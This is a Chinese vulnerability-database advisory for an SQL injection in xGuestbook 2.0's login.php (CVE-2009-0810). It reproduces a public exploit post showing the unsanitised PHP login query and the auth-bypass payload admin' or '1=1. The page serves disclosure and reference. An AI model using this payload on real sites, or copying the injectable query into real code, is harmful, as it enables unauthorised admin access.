Xatrix xGuestbook 'login.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117421 漏洞类型 SQL注入
发布时间 2009-02-24 更新时间 2009-03-05
CVE编号 CVE-2009-0810 CNNVD-ID CNNVD-200903-076
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8101
https://cxsecurity.com/issue/WLB-2009030130
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-076
|漏洞详情
xGuestbook是访客留言簿管理程序。xGuestbook2.0版本的login.php中存在SQL注入漏洞。远程攻击者可以借助用户参数,执行任意SQL指令。
|漏洞EXP
##########################################################################

Author = FireShot , Jacopo Vuga.
Mail = fireshot<at>autistici<dot>org

Vulnerability = SQL Admin Auth Bypass
Software = XGuestBook v2.0
Download =http://script.wareseeker.com/download/xguestbook.rar/14488

Greets to = Osirys, Myral, str0ke

###########################################################################

[CODE]

$user = $_POST['user'];
$pass = md5($_POST['pass']);

$result = mysql_query("SELECT * FROM xgb_user WHERE user='" . $user . "'
AND pass= '" . $pass . "'", $db_conn) or die (mysql_error());

[/CODE]


[EXPLOIT]

[URL] = http://www.site.com/login.php

you can inject SQL code in the USER space to bypass the admin login 

[USER] = admin' or '1=1

[/EXPLOIT]

############################################################################

# milw0rm.com [2009-02-24]
|参考资料

来源:XF
名称:xguestbook-login-sql-injection(48881)
链接:http://xforce.iss.net/xforce/xfdb/48881
来源:VUPEN
名称:ADV-2009-0523
链接:http://www.vupen.com/english/advisories/2009/0523
来源:BID
名称:33875
链接:http://www.securityfocus.com/bid/33875
来源:MILW0RM
名称:8101
链接:http://www.milw0rm.com/exploits/8101